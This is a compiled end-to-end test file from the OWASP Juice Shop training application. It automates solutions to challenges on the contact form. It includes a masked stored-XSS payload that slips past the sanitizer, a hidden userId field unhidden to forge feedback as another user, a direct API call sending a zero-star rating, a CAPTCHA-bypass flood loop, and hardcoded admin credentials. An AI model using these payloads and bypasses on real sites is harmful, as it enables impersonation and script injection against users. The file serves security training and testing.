"use strict";
/*
 * Copyright (c) 2014-2022 Bjoern Kimminich & the OWASP Juice Shop contributors.
 * SPDX-License-Identifier: MIT
 */
Object.defineProperty(exports, "__esModule", { value: true });
const config = require("config");
const protractor_1 = require("protractor");
const e2eHelpers_1 = require("./e2eHelpers");
const utils = require('../../lib/utils');
const pastebinLeakProduct = config.get('products').filter((product) => product.keywordsForPastebinDataLeakChallenge)[0];
describe('/#/contact', () => {
    let comment, rating, submitButton, captcha, snackBar;
    beforeEach(() => {
        void protractor_1.browser.get(`${e2eHelpers_1.basePath}/#/contact`);
        comment = (0, protractor_1.element)(protractor_1.by.id('comment'));
        rating = (0, protractor_1.element)(protractor_1.by.id('rating'));
        captcha = (0, protractor_1.element)(protractor_1.by.id('captchaControl'));
        submitButton = (0, protractor_1.element)(protractor_1.by.id('submitButton'));
        snackBar = (0, protractor_1.element)(protractor_1.by.css('.mat-simple-snackbar-action.ng-star-inserted')).element(protractor_1.by.css('.mat-focus-indicator.mat-button.mat-button-base'));
        solveNextCaptcha();
    });
    describe('challenge "forgedFeedback"', () => {
        (0, e2eHelpers_1.beforeEachLogin)({ email: `admin@${config.get('application.domain')}`, password: 'admin123' });
        it('should be possible to provide feedback as another user', () => {
            const EC = protractor_1.protractor.ExpectedConditions;
            void protractor_1.browser.executeScript('document.getElementById("userId").removeAttribute("hidden");');
            void protractor_1.browser.executeScript('document.getElementById("userId").removeAttribute("class");');
            void protractor_1.browser.wait(EC.visibilityOf((0, protractor_1.$)('#userId')), 5000);
            const UserId = (0, protractor_1.element)(protractor_1.by.id('userId'));
            void UserId.clear();
            void UserId.sendKeys('2');
            void comment.sendKeys('Picard stinks!');
            void rating.click();
            void submitButton.click();
            void protractor_1.browser.get(`${e2eHelpers_1.basePath}/#/administration`);
            expect((0, protractor_1.$$)('mat-row mat-cell.mat-column-user').last().getText()).toMatch('2');
        });
        (0, e2eHelpers_1.expectChallengeSolved)({ challenge: 'Forged Feedback' });
    });
    if (!utils.disableOnContainerEnv()) {
        describe('challenge "persistedXssFeedback"', () => {
            (0, e2eHelpers_1.beforeEachLogin)({ email: `admin@${config.get('application.domain')}`, password: 'admin123' });
            it('should be possible to trick the sanitization with a masked XSS attack', () => {
                const EC = protractor_1.protractor.ExpectedConditions;
                void comment.sendKeys('<<script>Foo</script>iframe src="javascript:alert(`xss`)">');
                void rating.click();
                void submitButton.click();
                void protractor_1.browser.sleep(5000);
                void protractor_1.browser.waitForAngularEnabled(false);
                void protractor_1.browser.get(`${e2eHelpers_1.basePath}/#/about`);
                void protractor_1.browser.wait(EC.alertIsPresent(), 15000, "'xss' alert is not present on /#/about");
                void protractor_1.browser.switchTo().alert().then(alert => {
                    expect(alert.getText()).toEqual(Promise.resolve('xss'));
                    void alert.accept();
                });
                void protractor_1.browser.get(`${e2eHelpers_1.basePath}/#/administration`);
                void protractor_1.browser.wait(EC.alertIsPresent(), 15000, "'xss' alert is not present on /#/administration");
                void protractor_1.browser.switchTo().alert().then(alert => {
                    expect(alert.getText()).toEqual(Promise.resolve('xss'));
                    void alert.accept();
                    void (0, protractor_1.$$)('.mat-cell.mat-column-remove > button').last().click();
                    void protractor_1.browser.wait(EC.stalenessOf((0, protractor_1.element)(protractor_1.by.tagName('iframe'))), 5000);
                });
                void protractor_1.browser.waitForAngularEnabled(true);
            });
            (0, e2eHelpers_1.expectChallengeSolved)({ challenge: 'Server-side XSS Protection' });
        });
    }
    describe('challenge "vulnerableComponent"', () => {
        it('should be possible to post known vulnerable component(s) as feedback', () => {
            void comment.sendKeys('sanitize-html 1.4.2 is non-recursive.');
            void comment.sendKeys('express-jwt 0.1.3 has broken crypto.');
            void rating.click();
            void submitButton.click();
        });
        (0, e2eHelpers_1.expectChallengeSolved)({ challenge: 'Vulnerable Library' });
    });
    describe('challenge "weirdCrypto"', () => {
        it('should be possible to post weird crypto algorithm/library as feedback', () => {
            void comment.sendKeys('The following libraries are bad for crypto: z85, base85, md5 and hashids');
            void rating.click();
            void submitButton.click();
        });
        (0, e2eHelpers_1.expectChallengeSolved)({ challenge: 'Weird Crypto' });
    });
    describe('challenge "typosquattingNpm"', () => {
        it('should be possible to post typosquatting NPM package as feedback', () => {
            void comment.sendKeys('You are a typosquatting victim of this NPM package: epilogue-js');
            void rating.click();
            void submitButton.click();
        });
        (0, e2eHelpers_1.expectChallengeSolved)({ challenge: 'Legacy Typosquatting' });
    });
    describe('challenge "typosquattingAngular"', () => {
        it('should be possible to post typosquatting Bower package as feedback', () => {
            void comment.sendKeys('You are a typosquatting victim of this Bower package: anuglar2-qrcode');
            void rating.click();
            void submitButton.click();
        });
        (0, e2eHelpers_1.expectChallengeSolved)({ challenge: 'Frontend Typosquatting' });
    });
    describe('challenge "hiddenImage"', () => {
        it('should be possible to post hidden character name as feedback', () => {
            void comment.sendKeys('Pickle Rick is hiding behind one of the support team ladies');
            void rating.click();
            void submitButton.click();
        });
        (0, e2eHelpers_1.expectChallengeSolved)({ challenge: 'Steganography' });
    });
    describe('challenge "zeroStars"', () => {
        it('should be possible to post feedback with zero stars by double-clicking rating widget', () => {
            void protractor_1.browser.executeAsyncScript((baseUrl) => {
                // @ts-expect-error
                const callback = arguments[arguments.length - 1];
                const xhttp = new XMLHttpRequest();
                let captcha;
                xhttp.onreadystatechange = function () {
                    if (this.status === 200) {
                        captcha = JSON.parse(this.responseText);
                        sendPostRequest(captcha);
                    }
                };
                xhttp.open('GET', `${baseUrl}/rest/captcha/`, true);
                xhttp.setRequestHeader('Content-type', 'text/plain');
                xhttp.send();
                function sendPostRequest(_captcha) {
                    const xhttp = new XMLHttpRequest();
                    xhttp.onreadystatechange = function () {
                        if (this.status === 201) {
                            console.log('Success');
                            callback();
                        }
                    };
                    xhttp.open('POST', `${baseUrl}/api/Feedbacks`, true);
                    xhttp.setRequestHeader('Content-type', 'application/json');
                    xhttp.send(JSON.stringify({ "captchaId": _captcha.captchaId, "captcha": `${_captcha.answer}`, "comment": "Comment", "rating": 0 })); // eslint-disable-line
                }
            }, protractor_1.browser.baseUrl);
        });
        (0, e2eHelpers_1.expectChallengeSolved)({ challenge: 'Zero Stars' });
    });
    describe('challenge "captchaBypass"', () => {
        const EC = protractor_1.protractor.ExpectedConditions;
        xit('should be possible to post 10 or more customer feedbacks in less than 10 seconds', () => {
            void protractor_1.browser.waitForAngularEnabled(false);
            for (let i = 0; i < 11; i++) {
                void comment.sendKeys(`Spam #${i}`);
                void rating.click();
                void submitButton.click();
                void protractor_1.browser.wait(EC.visibilityOf(snackBar), 200, 'SnackBar did not become visible');
                void snackBar.click();
                void protractor_1.browser.sleep(200);
                solveNextCaptcha(); // first CAPTCHA was already solved in beforeEach
            }
            void protractor_1.browser.waitForAngularEnabled(true);
        });
        // expectChallengeSolved({ challenge: 'CAPTCHA Bypass' })
    });
    describe('challenge "supplyChainAttack"', () => {
        it('should be possible to post GitHub issue URL reporting malicious eslint-scope package as feedback', () => {
            void comment.sendKeys('Turn on 2FA! Now!!! https://github.com/eslint/eslint-scope/issues/39');
            void rating.click();
            void submitButton.click();
        });
        (0, e2eHelpers_1.expectChallengeSolved)({ challenge: 'Supply Chain Attack' });
    });
    describe('challenge "dlpPastebinDataLeak"', () => {
        it('should be possible to post dangerous ingredients of unsafe product as feedback', () => {
            // @ts-expect-error
            void comment.sendKeys(pastebinLeakProduct.keywordsForPastebinDataLeakChallenge.toString());
            void rating.click();
            void submitButton.click();
        });
        (0, e2eHelpers_1.expectChallengeSolved)({ challenge: 'Leaked Unsafe Product' });
    });
    function solveNextCaptcha() {
        void (0, protractor_1.element)(protractor_1.by.id('captcha')).getText().then((text) => {
            void captcha.clear();
            const answer = eval(text).toString(); // eslint-disable-line no-eval
            void captcha.sendKeys(answer);
        });
    }
});
//# sourceMappingURL=contactSpec.js.map